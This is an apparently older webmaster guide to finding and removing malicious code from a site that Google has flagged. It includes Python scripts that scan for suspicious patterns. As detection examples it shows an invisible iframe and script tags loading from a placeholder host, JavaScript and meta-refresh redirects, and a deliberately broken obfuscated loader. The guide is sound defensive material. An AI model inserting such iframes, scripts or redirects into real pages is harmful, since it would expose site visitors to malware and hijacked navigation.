25 Years of Programming
An open source source for C, C++, OWL, BASIC, MDB, XLS, DOT, and more...
How to remove the "This site may harm your computer" warning from your website's listings in Google search results, step by step
What is the warning?

The warning is not a punishment or penalty, and it does not mean that Google, Yahoo, or StopBadware think you designed your site to be malicious. They all know that the overwhelming majority of webmasters do not create malicious pages on purpose and that you probably didn't, either. But they also don't want to send their customers to dangerous pages, and they do require you to do the necessary cleanup before they start referring visitors again. You are probably wondering what happened to your site that got it flagged.

Why is your site flagged?

Here are reasons why your website can be flagged with the "This site may harm your computer" warning in Google search results:
StopBadware and Google describe the criteria they use to determine whether a website is contributing to the badware problem. The Firefox 3+ and Chrome browsers use data from the Google Safe Browsing Service to warn users about suspected malicious sites. If your site is flagged in Google search results, Firefox 3 users are getting a warning that says, "Reported Attack Site!", and they are blocked from going there.

Why antivirus scanning might not find the bad code

The first idea that occurs to many webmasters is to do an AV scan on the site, but in many cases that will not find the problem. The next sections explain why.

A) Scanning your website files on the server

Scanning your server with an antivirus program will only work if the site is actually hosting the virus, which it often isn't. More likely, the virus itself is hosted on another computer. Your pages have been injected with iframe or JavaScript code that refers indirectly (with src=) to the virus on the other website. Thus, the AV program on your server sees only iframes and JavaScript which don't trigger virus alerts because they aren't viruses. The remote viruses aren't pulled in until the page is loaded into a visitor's browser. Then their browser fetches the code referred to by the src= property, and then they get a virus alert. If you scan your site with an antivirus program and it finds no viruses, that does not mean the site is clean.

B) Downloading your site files to your PC and scanning them there

Using a tool like FTP, Wget, or cURL to download the source code of your pages to your local PC and AV-scanning them there is also unlikely to find the virus, for the same reason given above: the actual virus is probably not on the pages. Wget in "recursive download" mode can retrieve all linked files, including ones from remote sites, but if some of them are viruses, you will be taking the unnecessary risk of downloading them directly to your PC.
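To make the point of sections A and B concrete, here is a minimal Python sketch (not part of any antivirus product) that lists what a scanner ignores: the src= targets of iframe and script tags that point away from your own site. The host name example.com stands in for your domain and is an assumption, and remotesite.com is only a placeholder for a host you don't recognize.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class SrcCollector(HTMLParser):
    """Collect the src= targets of iframe and script tags."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # The parser lowercases tag and attribute names for us.
        if tag in ("iframe", "script"):
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append((tag, value))


def external_sources(html, own_host):
    """Return (tag, url) pairs whose host is not own_host or a subdomain of it."""
    parser = SrcCollector()
    parser.feed(html)
    found = []
    for tag, url in parser.sources:
        host = urlparse(url).hostname
        # Relative URLs have no host, so they point at your own site.
        if host and host != own_host and not host.endswith("." + own_host):
            found.append((tag, url))
    return found


# Hypothetical page: one local script and one invisible remote iframe.
page = '''<html><body>
<script src="/js/menu.js"></script>
<iframe src="http://remotesite.com/path/file" width="0" height="0"></iframe>
</body></html>'''

for tag, url in external_sources(page, "example.com"):
    print(tag, url)
```

Anything it prints is not necessarily malicious. It is simply a remote reference that you should be able to recognize and trust.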
C) Risky - browse your pages with an antivirus program running on your PC

If you are determined to use the facilities of an AV program to scan your site, you can browse the site as if you were an ordinary visitor. This is risky because an increasing number of viruses are "polymorphic". Their code changes so frequently (every day or every time they are served) that antivirus programs can't keep up, and they do a poor job of detecting them:
In summary, antivirus scanning is not definitive. If it finds a problem, that's useful. If it doesn't find a problem, it means nothing because the virus might be on a different website, or might be encrypted and polymorphic, or your website's problem might not be a virus at all. It might be a malicious redirect in the .htaccess file that occurs only for users coming from search engine results, or it might be a bad outlink on one or more of your pages. So the most thorough way to examine the site is to learn what to look for and then inspect your source files manually.

How to search your pages for malicious code

1) Discover which pages are flagged for malware and get clues about why they are flagged
Now that you have preliminary information about which pages are affected and what seems to be wrong with them, you can start searching for bad code. Some of it might have been identified in steps 9 and 10 above.

2) Remember to search your source code for badware

Whenever possible, view and search the source code of your pages, on your server. This allows you to see ALL the code, even if it is only put on the pages sometimes.

Explanation: Some exploits put malicious code on pages only under certain conditions such as if the visitor is using Internet Explorer or if they came to your site from a Yahoo or Google search results page. Your particular viewing might not meet those conditions (such as if you're using Firefox or you went directly to the site without going through a search engine). If you examine pages with your browser's View Source command, you can think the page is clean even though at other times, or when other people view it, it's not. Examining the source code on your server lets you see all the code that's there.

3) Programs for searching pages for malicious code

3a) Search one page at a time (recommended)
Starting with the most important flagged page (such as your home page), visually inspect the source code of each file for the types of malicious text described in Section 4 below. Malicious code is often inserted into web page files by robots (programs) using very simple rules for where to put it. Common locations are:
If your pages normally validate at W3C, go there and check your badware-flagged pages. Any errors you get might point directly to where the bad code is.

3b) Multi-file searching

With multi-file searching, a program scans all files for the search string you specify, and reports all the instances it finds. This is an efficient way to search if you already know how to do it. Otherwise, this is probably not the best time to learn, and I'd recommend the one-page-at-a-time method, above.

Dedicated server: Do your search directly on the server with an operating system tool like grep.

Shared server: If you're already familiar with cron and grep, you can create a cron job to do the grep search as though you had shell (command line) access. Otherwise, download the pages (or your entire site) to your PC so you can search them there. Download with:
After downloading the pages to your PC, you can do the searching with any program that supports searching multiple files. Some examples:
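A short script can also do the job. The following is a minimal Python sketch of a multi-file search, not a replacement for a dedicated tool. The search strings (iframe, src=, http://) and the file extensions are taken from elsewhere in this article and are only a starting set, and the folder name site_copy in the usage comment is hypothetical.

```python
from pathlib import Path

# File types that take part in building pages (a starting set; extend as needed).
EXTENSIONS = {".html", ".htm", ".php", ".asp", ".aspx", ".inc", ".cfm", ".js"}
# Lowercase strings to look for; matching is case-insensitive.
SEARCH_STRINGS = ["<iframe", "src=", "http://"]


def search_files(root, needles=SEARCH_STRINGS):
    """Yield (path, line_number, line) for every line containing a needle."""
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        # errors="replace" keeps the scan going on files with odd encodings.
        text = path.read_text(encoding="utf-8", errors="replace")
        for number, line in enumerate(text.splitlines(), start=1):
            lowered = line.lower()
            if any(needle in lowered for needle in needles):
                yield path, number, line.strip()


# Usage (hypothetical folder holding the downloaded copy of your site):
# for path, number, line in search_files("site_copy"):
#     print(f"{path}:{number}: {line[:120]}")
```

Expect many harmless hits, since legitimate pages are full of src= and http://. The output is a list of places to look, not a verdict.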
4) Search strings to find malicious code

These are useful search strings, whether you are searching one file at a time or all files at once:
Make sure all instances of src= and http:// refer to files on your site or to external sites you know and trust. Some common trusted sites that are not a problem are:
4a) What do malicious or invisible iframes look like?

iframe code looks like this. If you don't recognize remotesite.com, the code is suspicious. This example combines two separate methods of making it an "invisible iframe", either one of which would work by itself: the width and height settings, or the style:

<iframe src="http://remotesite.com/path/file" width="0" height="0" frameborder="0" style="display:none"></iframe>

Whenever you find an iframe like this, do a web search on remotesite.com to find security-related websites, blogs, or forum posts that discuss it:

remotesite.com malware OR hacked

Be careful to avoid clicking any result that is the malicious website, or is a website that was infected by it!

Some iframes are always associated with a particular type of exploit, so information about the one you found can save a lot of time discovering how your website got hacked. For example, iframes referencing gumblar.cn, martuz.cn, and a growing list of others are the result of FTP password theft from the webmaster's PC, so the security problem is on the PC, not the server.

4b) What do malicious JavaScript references look like?

JavaScript references to external sites look like this. If you don't recognize remotesite.com, the code is suspicious. This code calls and runs a JS script that is hosted on a website that isn't yours. After a visitor loads your page, their browser fetches this JavaScript from the other site and runs it:

<script language="JavaScript" src="http://remotesite.com/path/file.js"></script>

4c) What does malicious or obfuscated JavaScript code look like?

Malicious JavaScript code directly on your pages (rather than being called by reference as described above) is often "obfuscated", "obscured", or "encoded" to make it hard to tell what it does. It looks like an undecipherable jumble, like this (this has been greatly shortened and mangled to make it nonfunctional).
Code like this is always suspicious and must be investigated:

<script language="JavaScript">function nbsp() {var t,o,l,i,j;var s=''; s+='47116101120'; s+='097114099111'; s=s+'1203403211910'; s=s+'7121058110111112'; s=s+'9062032'; t='';l=s.length;i=0; while(i<(l-1)) {for(j=0;j<3;j++){t+=s.charAt(i);i++;} if((t-nescape(0xBF))>unscape(0x00)) t-=-(uescape(0x08)+unescae(0x30)); doc.rite(String.froCharCode(t));t='';}}nbsp(); </script>

Sometimes VBScript is used instead of JavaScript.

If in doubt about whether a block of code is malicious, take a snippet of it and do a web search on it.

5) Which pages to search for malicious code

Search all the files that have any part in creating your web pages: .html, .htm, .php, .asp, .aspx, .inc (include files), .cfm, and whatever other extensions you use.

Inspect .js JavaScript and any other script files (including ones that you know originally came from a trusted source), watching for obfuscated code as described above. Some exploits try to do as little damage to the site as possible, adding only one small malicious JavaScript function to an otherwise normal .js file, so that it goes undetected for as long as possible and is difficult to find.

If you find nothing in your text files, it might be necessary to search your database for malicious code, which is discussed in Section 12 below.

6) Search your pages for links to flagged sites

If your site can still be flagged for outlinking directly to another site that has badware on it (which, as mentioned earlier, I am not sure is still the case), only one-hop links count. If you link to a site that links to a site that has badware, that does not cause a flag.

Having a large number of outlinks makes you especially vulnerable. If you link to 1000 other sites, what are the chances that they all manage to stay clean all the time?

To investigate, make a list of all the sites you link to. For each one:
If any of the site's pages have the "This site may harm your computer" warning, you may be flagged for linking to them. Or they may be flagged for linking to you, if they do. There's no way to tell which it is. If you have a good relationship with the other site, tell them they've been flagged. They might not know about it.

7) Forum posts and blog comments

Examine the user-generated content on your site for malicious links that may have been posted by visitors or spambots. To be efficient, start with posts from a few days before the site first got flagged. Or start at the end and work backwards. For every link to another site, do a Google site: search to see if it's flagged. If it is, remove the link.

8) Advertisements that Google considers badware

If you run affiliate ads or ads from advertising networks, you usually put the ads on the page by inserting iframe links or JavaScript into the code of your pages. The ads are retrieved from the third party sites only when your page is loaded into a visitor's browser.

There are a few advertising networks that do things in their code that StopBadware and Google consider badware behavior. There are also ad networks that fail to properly screen the ads submitted by advertisers for distribution, so sometimes malicious ads get into their inventory.

Make a list of the advertisers you are affiliated with. Do a web search on them or ask about them in a forum where there are people who might be up-to-date with which advertisers (if any) are currently problematic. An example of a web search that I have found useful is:

advertiser badware OR StopBadware OR malware OR virus

Bad ads can slip into even the big ad networks. DoubleClick clients got hit in 2007.

An increasing amount of advertising is being served in Flash .swf files. These files can be flagged as badware, too. See the next section.

9) Out-of-date, exploitable, malicious Shockwave Flash files

There have been numerous security vulnerabilities found in Flash.
In addition, Flash scripting allows authors to embed badware behavior such as redirecting to a different website while the user is helpless to prevent it. Whether your Flash files serve third-party advertising or merely your own content, they will get flagged if Google determines they have malicious scripting or are otherwise a hazard to a visitor's PC. The easiest way to determine whether .swf files are the reason for your site being flagged is to remove the files as part of your initial site cleanup. After the badware flag is removed from your site, put the files back. If the flag returns, they're a problem. You can also try scanning your .swf files with the AdopsTools Online click checker, which gives you a report about the file's content. These links might help you investigate further:
Technical articles:
While you are investigating and fixing your site, you might want to keep Flash disabled in your browser in case you have a bad .swf file. In Internet Explorer, go to Tools > Manage Add-ons > Enable or Disable Add-ons > Add-ons that have been used by Internet Explorer. Disable two items: 1) Shockwave Flash Object and 2) Shockwave ActiveX Control (if present). For Firefox, there is a highly recommended plug-in called NoScript to block Flash, JavaScript, Java, and more.

10) Advertisements from otherwise legitimate ad networks that have been hacked and are now serving badware

Even if your advertisers normally use only legitimate methods, their ads might have been replaced with malicious code, which would start appearing on your pages instead of the usual ads. This is a danger anytime your pages pull some of their content from other sites.

This is one case where the only way to detect the malicious code is to visit your site pages with your browser, to make sure all the ads are the legitimate ones you expect. If you are affected by the problems an advertising network is having, you won't be the only one, so a web search should turn up other similar reports.

11) Other third party content

If you use any code that includes content from a remote site, such as
there is always the danger that a problem at the other site could affect your pages.

12) Database content from your CMS

If content for your site pages is stored in a Content Management System (CMS) database, it is possible that an SQL injection attack inserted malicious code into the database tables, and it is getting into your pages from there.

One way to search or visually inspect and clean the data in your database tables is with cPanel > phpMyAdmin.

Another way that should sometimes be workable is to go to cPanel > Backups and download a backup of the database in sql.gz format, which is a plain text file once it is decompressed. If your antivirus software allows you to keep the downloaded file (it might detect the malware and quarantine the file instantly), and if the database isn't huge, you can view the text in a text editor, search and replace the malicious code, and upload the cleaned database back to the server.

The easiest way to clean the database is to restore it from a known-good backup.

13) Rewrites or redirects in your .htaccess file(s)

Examine your site configuration files such as Apache .htaccess and httpd.conf for code that sends your visitors to a malicious site. Look for lines containing the words Rewrite or Redirect with references to sites that aren't yours, and RewriteRule lines referring to google.com or yahoo.com.

.htaccess exploits often redirect only if the visitor came from a search engine. If your visitors report being redirected and you can't reproduce the behavior yourself, try going to your site from a Google search result.

In your existing .htaccess files, search carefully and scroll all the way to the bottom of the file. Sometimes hundreds of blank lines are inserted before the malicious code.

Look for new .htaccess files that might have been added to the site. Search all the folders inside /public_html and also the folder(s) above /public_html.
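The .htaccess checks described above can be partly automated. This is a minimal Python sketch under stated assumptions: it flags Rewrite and Redirect lines that mention a host other than your own or that mention google or yahoo, and it reports line numbers so code hidden below hundreds of blank lines is not missed. The domain example.com and the sample file contents are hypothetical, and the patterns are deliberately crude, so treat the result as a list of lines to read rather than proof of an exploit.

```python
import re

# Lines that begin with a Rewrite... or Redirect... directive.
DIRECTIVE = re.compile(r"^\s*(Rewrite\w*|Redirect\w*)\b", re.IGNORECASE)
# Host names inside absolute URLs on the line.
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)
# Search engine names, which show up in referrer-based conditions.
SEARCH_ENGINE = re.compile(r"google|yahoo", re.IGNORECASE)


def suspicious_lines(text, own_host):
    """Return (line_number, line) pairs worth a manual look."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        if not DIRECTIVE.match(line):
            continue
        hosts = [h.lower() for h in URL_HOST.findall(line)]
        foreign = [h for h in hosts
                   if h != own_host and not h.endswith("." + own_host)]
        if foreign or SEARCH_ENGINE.search(line):
            findings.append((number, line.strip()))
    return findings


# Hypothetical infected file: the bad rules sit below 200 blank lines.
sample = (
    "RewriteEngine On\n"
    + "\n" * 200
    + "RewriteCond %{HTTP_REFERER} .*google.* [NC]\n"
    + "RewriteRule ^(.*)$ http://unknownsite.com/ [R=301,L]\n"
)

for number, line in suspicious_lines(sample, "example.com"):
    print(number, line)
```

A legitimate rule can also mention a search engine or an outside host, so every reported line still needs to be read and understood before it is deleted.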
14) JavaScript redirects

JavaScript is another way your page can automatically redirect visitors to a different website. While examining the JavaScript in your site, look for code like the following. It can be in the JavaScript code in your pages, or, increasingly common, injected into your .js files that are called by your pages:

window.location="http://unknownsite.com/"

15) Meta-refresh redirects

An HTML meta-refresh is yet another way to automatically redirect visitors to a different website. Look for code like this within the <head></head> sections of your documents:

<meta http-equiv="refresh" content="0; url=http://unknownsite.com/">

These examples redirect to the other page after 0 seconds.

16) Check your error pages

If you have custom error pages that you created and that are stored within your website, you probably examined those files already in the previous steps.

However, many websites don't have custom error documents. In that case, the server uses its default error documents which are stored outside your website. You can test those by provoking a server error and checking the page you receive:
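One way to provoke such an error, sketched here in Python under stated assumptions, is to request a page name that cannot exist on your site and then read the body of the 404 response. The function names and the address example.com are hypothetical, and the sketch covers only the "page not found" case, not other server errors.

```python
import uuid
import urllib.error
import urllib.request


def missing_page_url(base_url):
    """Build a URL that almost certainly does not exist on the site."""
    return base_url.rstrip("/") + "/" + uuid.uuid4().hex + ".html"


def fetch_error_page(base_url, timeout=10):
    """Request a nonexistent page and return (status_code, body_text)."""
    url = missing_page_url(base_url)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as response:
            # A 200 here means the server answered the bogus URL with a page,
            # for example through a custom handler or a rewrite rule.
            return response.status, response.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as error:
        # A 404 arrives as an exception; its body is the error page itself.
        return error.code, error.read().decode("utf-8", "replace")


# Usage (replace the address with your own site):
# status, body = fetch_error_page("http://example.com")
# print(status)
# print(body[:500])
```

Read the returned text as source code rather than opening it in a browser, and look for the same iframes, script references, and redirects described in the earlier sections.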
If you find bad links or viruses on your server's default error pages, it is a sign that the server, not just your website, has been compromised. Continue to the next step, and notify your webhosting company.

17) Server has a rootkit installed

A rootkit is a type of infection that installs malicious programs to partially replace the server's operating system. It performs ordinary operating system tasks just like the OS would, but it also performs whatever malicious activity it is programmed to do. Because it controls operating system tasks, it can hide itself. A server compromised with a rootkit-type infection cannot be trusted at all, not even to properly report on its own status or give accurate directory listings.

If you have thoroughly investigated all the preceding possibilities and you are sure everything inside your site is clean, it is possible that areas of your server outside your website are compromised (such as the default error pages in the previous step), or the server itself might be infected with software such as a rootkit. It might be injecting malicious content onto your pages in real time, after the pages are read from disk and just before they are sent out.

One possible indication of a compromised server is a situation where, even though your request wasn't redirected to some other malicious website (that is, you are getting a page from your site), the page you get in your browser is completely different -- every time, or just sometimes -- from the one that you know is on your server. For example, the page on your server is completely clean, but when you request it with your browser or with wget, it's nothing but a page full of JavaScript, or a page with an iframe in it. One type of attack that works this way is called beladen.

The behavior described above is not proof of a compromised server, however.
For example, it is possible for the hacker to put new pages -- or even an entire website -- inside your website and then use .htaccess rewrites or PHP code to serve those pages instead of the requested ones. In this case, the pages are actually in your site and there is no server-wide compromise. With any luck, the investigation you've done to this point would already have uncovered either the hidden files or the rewrite code that is causing them to be served. If you truly believe your server is compromised and you're on shared hosting, there is nothing you can do to repair the damage to the server. File a support ticket with your webhost and ask them to investigate. While you wait, you can:
If you run a dedicated server, reformat the hard drive, reinstall and configure the operating system and server software, reinstall your site from known-good backups, --> fix the security vulnerability that allowed the compromise to occur <--, and start fresh. Server-wide compromises used to be rare. In 2009, with exploits such as beladen, the incidence is increasing. It is still almost the last thing you should suspect, but it's not as unlikely as it used to be. You might find the following articles useful if you suspect a server-wide compromise. The attacks discussed were from 2008, but their methods may have evolved into the more widespread attacks being seen today:
18) DNS cache poisoning

People think of website addresses as text like http://website.com, but web addresses are really numbers called IP addresses. Before a browser can fetch a web page from a site, it must first send a query to a DNS server to get the site's correct numeric address.

Occasionally, someone manages to inject bad data into a DNS server so the IP address translations it returns are wrong. If someone tries to visit your website but their browser gets your IP address from a poisoned DNS server, they will be sent to a completely wrong website. That site might have malicious content, which could cause your site to be flagged for badware.

When investigating your badware flag, this is a "way-out-there" scenario, rare and unlikely, but it has happened, so it's included here for completeness.

19) Ask for help

If the reason your site is flagged remains a mystery, feel free to post a message in our forum.

20) Request a review from Google or StopBadware

After you have found and resolved all the likely reasons your site got flagged, file a request for review in the Webmaster Tools section of Google Webmaster Central, or on the StopBadware Request for Review form.

If they find that the badware or badware links are gone, the warning flag is usually removed within one to a few days, even though their submission form says to allow longer.

If you change nothing on your site and only submit the review request, the flag will not be removed. Google's accuracy at identifying malware is nearly 100%.

Other resources
Keeping badware off your site

The most important ways to keep badware off your site are
Comments, questions, and discussion are welcome in the Forum.

In case you're wondering: no, this site has never been flagged. I have helped numerous webmasters get the warning removed, both in discussion forums and for hire.